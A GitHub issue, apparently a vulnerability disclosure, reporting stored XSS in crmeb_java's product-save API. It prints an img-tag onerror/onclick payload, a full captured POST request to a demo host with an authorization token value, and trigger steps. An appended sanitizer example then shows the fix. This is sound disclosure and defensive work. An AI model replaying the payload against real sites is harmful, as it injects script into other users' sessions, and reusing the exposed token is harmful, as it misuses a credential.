There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system #12

Open
Mechoy opened this issue Mar 15, 2023 · 0 comments

Comments

@Mechoy
Copy link

Mechoy commented Mar 15, 2023

[Suggested description]
A stored XSS vulnerability exists in crmeb_java <=1.3.4.
Failure to filter or validate parameters effectively results in stored XSS.

[Vulnerability Type]
Stored XSS

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/store/product/save

[Attack Type]
Remote

[Vulnerability details]
Payload:

<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>

Capture the request to the /api/admin/store/product/save interface.

POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg\"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}

The content parameter has a stored XSS vulnerability.
Insert the payload into it and send the request.
[screenshot: crmeb_java_2_1]
Find the added product, open the product details page, and click the inserted img tag to trigger the vulnerability.
[screenshot: crmeb_java_2_2]
There you can see it!

[Impact Code execution]
true

[Cause of vulnerability]
com.zbkj.admin.controller.StoreProductController, line 77.
The save() method of storeProductService is called on line 77 of this controller.
[screenshot: crmeb_java_2_3]
Follow this method into com.zbkj.service.service.impl.StoreProductServiceImpl.
On line 339, the value of the content parameter from the request body is saved to the database.
Now to the front end.
In crmeb_java\admin\src\views\store\creatStore\index.vue, on line 296, v-html is used to render the fetched content value. v-html renders whatever it is given as HTML.
[screenshot: crmeb_java_2_4]
The cause of this vulnerability is that there is no proper security check on user-supplied data.

The end, thanks!
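
Added example, not code from the crmeb_java project or from the issue author: an allowlist HTML sanitizer of the kind that should run on the `content` field before it is persisted (in the Java backend the equivalent would be a maintained sanitizer such as jsoup's `Jsoup.clean(html, Safelist)`; on the Vue side it would sit in front of the `v-html` binding). The sample input below is constructed from the issue's payload; the tag and attribute allowlist, and the function name `sanitizeProductContent`, are assumptions chosen for the example. The returned `dropped` list doubles as an audit signal when the function is run over rows already stored in the database.

```javascript
// Allowlist sanitizer for rich-text product descriptions (added example).
// Assumed allowlist: what a basic product editor needs, nothing else.
const ALLOWED_TAGS = new Set([
  "p", "br", "div", "span", "b", "strong", "i", "em", "u", "s",
  "ul", "ol", "li", "h1", "h2", "h3", "h4", "img", "a", "table", "tr", "td", "th",
]);
// Attributes allowed per tag; anything else, including every on* handler, is dropped.
const ALLOWED_ATTRS = { img: new Set(["src", "alt", "width", "height"]), a: new Set(["href", "title"]) };
const URL_ATTRS = new Set(["src", "href"]);
const RAW_TEXT_TAGS = new Set(["script", "style"]);   // their bodies are dropped too, not just the tags
const ATTR_RE = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Accept only http(s) and scheme-less (relative) URLs. Control characters and whitespace
// are stripped before the check because browsers ignore them inside a scheme ("java\tscript:" runs).
function isSafeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, "");
  const scheme = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(v);
  return scheme === null || ["http", "https"].includes(scheme[1].toLowerCase());
}

// Index of the '>' closing the tag that starts at html[start], honouring quoted attribute values.
function findTagEnd(html, start) {
  let quote = null;
  for (let i = start + 1; i < html.length; i++) {
    const c = html[i];
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
    else if (c === ">") return i;
  }
  return -1;
}

// Returns { html, dropped }: the re-serialised allowlisted markup, plus every removed
// tag ("script") or attribute ("img@onerror"). Text outside tags is always entity-escaped.
function sanitizeProductContent(html) {
  let out = "";
  const dropped = [];
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt === -1) { out += escapeHtml(html.slice(i)); break; }
    out += escapeHtml(html.slice(i, lt));
    if (html.startsWith("<!--", lt)) {                      // comments carry nothing worth keeping
      const end = html.indexOf("-->", lt + 4);
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    const gt = findTagEnd(html, lt);
    if (gt === -1) { out += escapeHtml(html.slice(lt)); break; }   // '<' with no tag end: plain text
    i = gt + 1;
    const m = /^(\/?)([a-zA-Z][a-zA-Z0-9]*)([\s\S]*?)\/?$/.exec(html.slice(lt + 1, gt));
    if (!m) { out += escapeHtml(html.slice(lt, gt + 1)); continue; }  // "<3", "< p": not a tag
    const [, slash, rawName, attrSrc] = m;
    const tag = rawName.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) {
      dropped.push(tag);
      if (RAW_TEXT_TAGS.has(tag) && !slash) {               // skip to the matching </script> or </style>
        const closeRe = new RegExp("</" + tag, "ig");
        closeRe.lastIndex = i;
        const close = closeRe.exec(html);
        const closeEnd = close ? findTagEnd(html, close.index) : -1;
        i = closeEnd === -1 ? html.length : closeEnd + 1;
      }
      continue;                                             // text children of other dropped tags survive, escaped
    }
    if (slash) { out += "</" + tag + ">"; continue; }
    const allowed = ALLOWED_ATTRS[tag] || new Set();
    let attrs = "";
    for (const a of attrSrc.matchAll(ATTR_RE)) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (!allowed.has(name) || (URL_ATTRS.has(name) && !isSafeUrl(value))) {
        dropped.push(tag + "@" + name);
        continue;
      }
      attrs += " " + name + '="' + escapeHtml(value) + '"';
    }
    out += "<" + tag + attrs + ">";
  }
  return { html: out, dropped };
}

// Constructed sample: the issue's payload as it would sit in the `content` field (JSON-unescaped).
const STORED_CONTENT =
  '<p>111</p><img src="1111" alt="2222" width="33" height="33" onclick="alert`333`" onerror=alert(2)/>';
const result = sanitizeProductContent(STORED_CONTENT);
console.log(result.html);     // <p>111</p><img src="1111" alt="2222" width="33" height="33">
console.log(result.dropped);  // [ 'img@onclick', 'img@onerror' ]
```

The sanitizer is deliberately an allowlist: it re-serialises only the tags and attributes it knows, so an unknown attribute (`onerror`, `onclick`, `style`) or an unknown scheme (`javascript:`, `data:`) never reaches the output even when the tokenizer has not seen that particular trick before. For production use a maintained library with the same allowlist semantics; the point here is where the check belongs (before `StoreProductServiceImpl` persists `content`, so that every consumer, not just this one `v-html` binding, gets clean data).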
